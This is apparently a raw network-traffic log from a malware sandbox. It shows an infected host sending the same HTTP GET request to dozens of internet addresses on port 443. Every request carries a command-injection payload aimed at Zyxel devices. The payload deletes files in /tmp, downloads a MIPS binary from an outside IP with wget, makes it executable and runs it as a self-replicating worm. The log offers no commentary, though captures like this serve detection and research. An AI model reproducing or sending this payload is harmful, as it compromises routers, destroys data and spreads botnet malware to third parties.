                                        Mar 31, 2024 09:22:49.937047005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9450192.168.2.2336848168.132.67.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937110901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9451192.168.2.2351480190.211.249.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937165022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9452192.168.2.2342450211.213.247.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937217951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9453192.168.2.235347857.186.94.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937269926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9454192.168.2.2350804178.133.75.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937356949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9455192.168.2.235103019.46.235.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937406063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9456192.168.2.234268814.44.163.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937474966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9457192.168.2.2337358104.176.124.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937539101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9458192.168.2.2351932145.224.52.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937568903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9459192.168.2.2344982150.238.93.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937622070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9460192.168.2.234164696.17.0.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937683105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9461192.168.2.235092480.94.171.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937724113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9462192.168.2.2353430171.16.230.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937773943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9463192.168.2.2334406111.145.201.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937823057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9464192.168.2.2339538157.105.239.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937887907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9465192.168.2.234082073.158.80.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937915087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9466192.168.2.234489464.195.16.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.937971115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9467192.168.2.2345188211.221.15.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938040018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9468192.168.2.233418439.108.123.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938062906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9469192.168.2.2332866141.140.22.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938133955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9470192.168.2.2333832156.188.89.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938167095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9471192.168.2.234512664.192.62.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938199043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9472192.168.2.234612653.174.9.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938258886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9473192.168.2.2345444114.81.97.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938297987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9474192.168.2.2348370197.70.230.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938349962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9475192.168.2.234190496.168.13.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938391924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9476192.168.2.2349932172.121.43.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938450098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9477192.168.2.2345984156.5.249.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938498020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9478192.168.2.235623847.189.208.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938539982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9479192.168.2.234529272.190.254.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938635111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9480192.168.2.2336434195.159.26.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938651085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9481192.168.2.2348826107.15.45.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938694000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9482192.168.2.2341324180.190.171.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938755989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9483192.168.2.2346552220.139.207.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938801050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9484192.168.2.2338660137.198.0.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938839912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9485192.168.2.2355434123.176.238.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938915014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9486192.168.2.234526682.128.145.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.938962936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9487192.168.2.2353590147.5.123.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939021111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9488192.168.2.2353358105.42.140.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939073086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9489192.168.2.23575725.88.161.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939121962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9490192.168.2.234636882.23.240.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939182997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9491192.168.2.233749483.87.159.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939218044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9492192.168.2.2332902170.83.118.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939294100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9493192.168.2.2359872161.136.7.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939347029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9494192.168.2.2344130102.152.2.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939378023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9495192.168.2.235456888.176.44.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939440966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9496192.168.2.2354932110.42.201.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939479113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9497192.168.2.235487265.231.4.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939552069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9498192.168.2.2356878157.50.230.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939585924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9499192.168.2.2360364220.154.148.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939656973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9500192.168.2.2341920128.237.98.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939711094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9501192.168.2.234151866.82.248.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939770937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9502192.168.2.235657240.47.178.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939846992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9503192.168.2.2355726179.134.240.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939876080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9504192.168.2.234025457.241.249.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939918995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9505192.168.2.235479013.227.143.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.939994097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9506192.168.2.2355448165.254.157.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940027952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9507192.168.2.2349114158.156.104.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940092087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9508192.168.2.2340286210.156.20.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940149069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9509192.168.2.234507285.137.57.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940213919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9510192.168.2.2354666118.64.212.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940279961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9511192.168.2.2354216145.118.48.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940330982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9512192.168.2.2351266138.175.39.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940365076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9513192.168.2.2353102170.138.197.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940418959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9514192.168.2.2358444193.20.212.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940475941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9515192.168.2.2345550181.178.5.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940534115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9516192.168.2.2349762122.188.42.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940593004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9517192.168.2.235650042.34.224.96443
                                        TimestampBytes transferredDirectionData
